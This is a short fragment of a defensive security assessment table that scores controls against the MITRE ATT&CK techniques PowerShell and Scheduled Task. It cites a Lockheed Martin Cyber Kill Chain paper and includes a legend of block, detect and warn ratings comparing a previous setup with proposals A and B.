T1086: PowerShell 2 0 2 2 2 0 0 8 8 8
T1053: Scheduled Task 2 2 1 0 2 2 0 7 9 7
37 43 39
100% 116% 105%
44 43 39
100% 98% 89%
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
[2] Would Warn of Activity
[0] N/A
[2] Would Block Activity
[1] Could Block Activity
[0] Would Not Block Activity
[2] Would Detect Activity
[0] No Detection or N/A
[2] Would Block Outbound Traffic
[1] Could Have Blocked
[0] Would Not Block Activity
[2] Proposal Applicable
[0] N/A
Previous compared to
Proposed A and B